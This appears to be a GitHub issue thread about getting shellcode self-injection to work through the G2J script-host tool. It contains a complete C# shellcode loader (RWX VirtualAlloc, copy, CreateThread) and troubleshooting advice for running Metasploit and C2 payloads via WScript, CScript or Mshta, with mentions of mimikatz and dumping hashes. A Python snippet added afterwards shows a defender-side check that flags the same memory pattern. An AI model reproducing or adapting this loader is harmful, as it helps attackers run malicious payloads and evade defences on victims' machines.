Is it possible to inject shellcode into itself with G2J #12
Comments
Hi, not sure which part is missing on your side, but the steps/PoC below worked for me:

```csharp
using System;
using System.Runtime.InteropServices;

namespace CreateThread
{
    public class Test
    {
        public Test()
        {
            ok();
        }

        public static void ok()
        {
            // Placeholder: the string is replaced with the base64 output of the shellcode file.
            byte[] sh = Convert.FromBase64String("cat shellcode.bin | base64");
            // Pointers are passed as UInt32 throughout, so this PoC assumes a 32-bit (x86) process.
            UInt32 addr = VirtualAlloc(0, (UInt32)sh.Length,
                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(sh, 0, (IntPtr)(addr), sh.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            IntPtr p = IntPtr.Zero;
            hThread = CreateThread(0, 0, addr, p, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId
        );

        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
            IntPtr hHandle,
            UInt32 dwMilliseconds
        );
    }
}
```
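As an added, defender-side example (not code from this thread or from G2J): the PoC's VirtualAlloc(MEM_COMMIT, PAGE_EXECUTE_READWRITE) followed by CreateThread at that address leaves a committed, private (non-image-backed) executable region with a thread start inside it, which is the pattern a memory scan looks for. The Python below flags that on a constructed region listing of the kind VirtualQueryEx returns; the Region class, the sample regions and the thread ids are assumptions made up for illustration.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Win32 memory constants; the PoC above uses MEM_COMMIT and PAGE_EXECUTE_READWRITE.
MEM_COMMIT, MEM_PRIVATE, MEM_IMAGE = 0x1000, 0x20000, 0x1000000
PAGE_READONLY, PAGE_READWRITE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE = 0x02, 0x04, 0x20, 0x40
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80  # PAGE_EXECUTE* family

@dataclass
class Region:
    """One entry of the kind VirtualQueryEx returns (MEMORY_BASIC_INFORMATION fields)."""
    base: int
    size: int
    state: int
    type: int
    protect: int

def is_private_executable(r: Region) -> bool:
    # Committed, not backed by an image or mapped file, and executable: exactly
    # what VirtualAlloc(MEM_COMMIT, PAGE_EXECUTE_READWRITE) in the PoC produces.
    return r.state == MEM_COMMIT and r.type == MEM_PRIVATE and bool(r.protect & EXEC_MASK)

def flag_threads(regions: List[Region], thread_starts: Dict[int, int]) -> List[Tuple[int, int, int]]:
    """Return (tid, start_address, region_base) for each thread whose start address
    lies inside a private executable region (the CreateThread(addr) step of the PoC).
    Threads that start inside image-backed code are left alone."""
    hits = []
    for tid, start in sorted(thread_starts.items()):
        for r in regions:
            if is_private_executable(r) and r.base <= start < r.base + r.size:
                hits.append((tid, start, r.base))
    return hits

# Constructed sample: a script-host process with its image, a heap and one RWX
# allocation. All addresses and thread ids are made up for illustration.
SAMPLE_REGIONS = [
    Region(0x00400000, 0x1000, MEM_COMMIT, MEM_IMAGE, PAGE_READONLY),            # PE header
    Region(0x00401000, 0x20000, MEM_COMMIT, MEM_IMAGE, PAGE_EXECUTE_READ),       # .text
    Region(0x00600000, 0x10000, MEM_COMMIT, MEM_PRIVATE, PAGE_READWRITE),        # heap
    Region(0x002A0000, 0x1000, MEM_COMMIT, MEM_PRIVATE, PAGE_EXECUTE_READWRITE), # VirtualAlloc RWX
]
SAMPLE_THREADS = {1000: 0x00401200, 1004: 0x002A0000}  # tid -> thread start address

if __name__ == "__main__":
    for tid, start, base in flag_threads(SAMPLE_REGIONS, SAMPLE_THREADS):
        print(f"thread {tid} starts at {start:#x} inside private executable region {base:#x}")
```

On a live system the same check runs over the real VirtualQueryEx output and thread start addresses of the script host (wscript/cscript/mshta) in use.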
How strange, unfortunately I do not have CS to test it with but tested it with a whole range of shellcodes from msf and other popular C2s + simple shellcodes in net to write a message to desktop and nothing. They all work in the C# exe/dll without any problem, just not with G2J. Sure I will spend the next few weekends banging my head against a wall only to find out it is something very simple! Thanks for the reply... fingers crossed I figure out what is wrong on my end :)

Tested the same PoC above with MSF shellcode & it worked. Maybe the issue you're dealing with has to do with the WScript/CScript or Mshta handler in use; #4 (comment). Or it could be related to the build configuration you used for building G2JS (x86, x64) and the .NET framework you (possibly) retargeted the project to. I hope this helps.

Hi med0x2e, thanks for all your help with this. For some strange reason nothing is working for me, but now I know it does work, time for some more manual debugging. It will probably end up being something silly that has stopped it all along. Thanks again!!! :)
Hi med0x2e,
Sorry, another question.
I have been playing around with g2j in a lab a lot (fantastic tool - thank you!). I have covered every single scenario but I cannot seem to get it to work if shellcode is injected into itself, i.e. createthread / virtual alloc. I have been using shellcode such as msf to pop calc or dump hashes. I also played around with adding sleep in case the process was ending too quickly, but nothing. Having seen that mimikatz can be embedded into g2j, I cannot see why it would not work but I am stumped. Should it be possible? And if not, would you mind explaining why? (Sorry, still a newbie so still learning a lot in labs and VMs.)
Thanks a million